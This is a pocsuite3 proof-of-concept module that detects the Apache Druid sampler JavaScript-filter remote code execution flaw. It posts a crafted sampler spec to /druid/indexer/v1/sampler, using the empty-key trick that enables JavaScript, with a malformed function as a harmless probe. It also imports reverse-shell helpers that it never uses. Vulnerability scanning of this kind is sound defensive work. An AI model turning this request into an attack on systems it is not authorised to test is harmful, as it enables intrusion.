import base64
import json
from collections import OrderedDict
from urllib.parse import urljoin
from pocsuite3.api import Output, POCBase, register_poc, logger, requests, get_listener_ip, get_listener_port
from pocsuite3.lib.core.interpreter_option import OptString
from pocsuite3.lib.utils import random_str
from pocsuite3.modules.listener import REVERSE_PAYLOAD
class DemoPOC(POCBase):
    """Detection PoC for the Apache Druid sampler JavaScript-filter issue.

    ``_verify`` posts an index-sampler spec whose JavaScript filter function
    is deliberately malformed and reports the target when the response body
    contains the ``org.mozilla.javascript.EvaluatorException`` class name.
    """

    vulID = '99119'  # ssvid
    version = '3.0'
    author = ['']
    vulDate = '2021-2-02'
    createDate = '2021-2-02'
    updateDate = '2021-2-02'
    references = ['']
    name = 'Apache Druid RCE'
    appPowerLink = ''
    # Was 'Seeyon OA', a copy-paste leftover: the name, description and
    # endpoint of this PoC all refer to Apache Druid.
    appName = 'Apache Druid'
    appVersion = ''
    vulType = 'RCE'
    desc = '\nApache Druid RCE漏洞\n'
    samples = []
    install_requires = ['']

    def _options(self):
        """Return the extra options declared by this PoC.

        Only ``command`` is declared (default ``whoami``). No method of this
        class reads it; it stays declared so invocations that already pass
        the option keep working.
        """
        options = OrderedDict()
        options["command"] = OptString('whoami', description='attack模式可以指定执行的命令')
        return options

    @staticmethod
    def _sampler_body(payload):
        """Serialise the sampler request using ``payload`` as the filter function.

        The request is built as a dict and passed through ``json.dumps`` so
        that quotes, backslashes or newlines in ``payload`` are escaped
        instead of corrupting the JSON document.
        """
        # Single inline JSON row that the sampler is asked to ingest.
        sample_row = ('{"isRobot":true,"channel":"#sv.wikipedia",'
                      '"timestamp":"2016-06-27T00:00:11.080Z"}')
        request_spec = {
            "type": "index",
            "spec": {
                "ioConfig": {
                    "type": "index",
                    "inputSource": {"type": "inline", "data": sample_row},
                    "inputFormat": {"type": "json", "keepNullColumns": True},
                },
                "dataSchema": {
                    "dataSource": "sample",
                    "timestampSpec": {"column": "timestamp", "format": "iso"},
                    "dimensionsSpec": {},
                    "transformSpec": {
                        "transforms": [],
                        "filter": {
                            "type": "javascript",
                            "function": payload,
                            "dimension": "added",
                            "value": "",
                            # NOTE(review): the empty-named key is presumably
                            # what switches JavaScript evaluation on for this
                            # filter -- confirm against the Druid advisory.
                            "": {"enabled": "true"},
                        },
                    },
                },
                "type": "index",
                "tuningConfig": {"type": "index"},
            },
            "samplerConfig": {"numRows": 500, "timeoutMs": 15000},
        }
        # Compact separators keep the wire format close to the original
        # hand-written template.
        return json.dumps(request_spec, separators=(',', ':'))

    def check(self, payload, flag):
        """POST the sampler request and look for ``flag`` in the response.

        :param payload: source text placed in the filter's ``function`` field.
        :param flag: substring expected in the response body.
        :return: the response text when ``flag`` occurs in it, else ``None``.
        """
        headers = {
            'Accept': 'application/json, text/plain, */*',
            'Referer': self.url,
            'Content-Type': 'application/json;charset=UTF-8',
        }
        endpoint = urljoin(self.url, '/druid/indexer/v1/sampler?for=filter')
        resp = requests.post(endpoint, data=self._sampler_body(payload), headers=headers)
        if flag in resp.text:
            return resp.text
        return None

    def _verify(self):
        """Probe the target and return the framework ``Output`` for it.

        Any exception raised while probing is logged and treated as "not
        vulnerable" so one failing target does not abort the run.
        """
        result = {}
        try:
            # Unterminated function body: an evaluating server is expected to
            # answer with a JavaScript evaluator error.
            payload = 'function(value){'
            if self.check(payload, 'org.mozilla.javascript.EvaluatorException'):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
        except Exception as e:
            logger.exception(e)
        return self.parse_output(result)

    def parse_output(self, result):
        """Wrap ``result`` in an ``Output``: success when non-empty, else fail."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output
# Pass the PoC class to pocsuite3's register_poc (imported at the top of the file).
register_poc(DemoPOC)
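# "No comments yet" -- stray page text, not part of the PoC; kept as a comment so the module stays importable.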